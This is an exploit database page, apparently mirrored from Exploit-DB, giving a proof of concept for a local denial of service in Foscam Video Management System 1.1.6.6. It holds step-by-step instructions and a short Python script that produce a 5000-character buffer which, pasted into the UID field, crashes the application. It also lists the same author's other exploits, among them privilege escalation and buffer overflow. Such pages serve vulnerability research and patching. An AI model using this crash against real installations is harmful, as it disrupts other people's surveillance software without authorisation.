Search for hundreds of thousands of exploits

"Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)"

Author

Exploit author

"Alessandro Magnosi"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-10-09

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Exploit Title: Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)
# Author: Alessandro Magnosi
# Date: 2019-10-09
# Vendor Homepage: https://www.foscam.com/
# Software Link : https://www.foscam.com/downloads/appsoftware.html?id=5
# Tested Version: 1.1.6.6
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 SP1 x86 en, Windows 10 Pro x64 it

# Steps to Produce the Crash: 
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.6.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"
# 6.- Copy the content of the file into UID
# 7.- Click on Login Check
# 8.- Crashed

#!/usr/bin/python
 
buffer = "A" * 5000
f = open ("FoscamVMS1.1.6.txt", "w")
f.write(buffer)
f.close()
Release DateTitleTypePlatformAuthor
2019-12-17"NopCommerce 4.2.0 - Privilege Escalation"webappsaspx"Alessandro Magnosi"
2019-10-09"DeviceViewer 3.12.0.1 - Arbitrary Password Change"localwindows"Alessandro Magnosi"
2019-10-09"Foscam Video Management System 1.1.6.6 - 'UID' Denial of Service (PoC)"doswindows"Alessandro Magnosi"
2019-10-09"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)"localwindows"Alessandro Magnosi"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47478/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.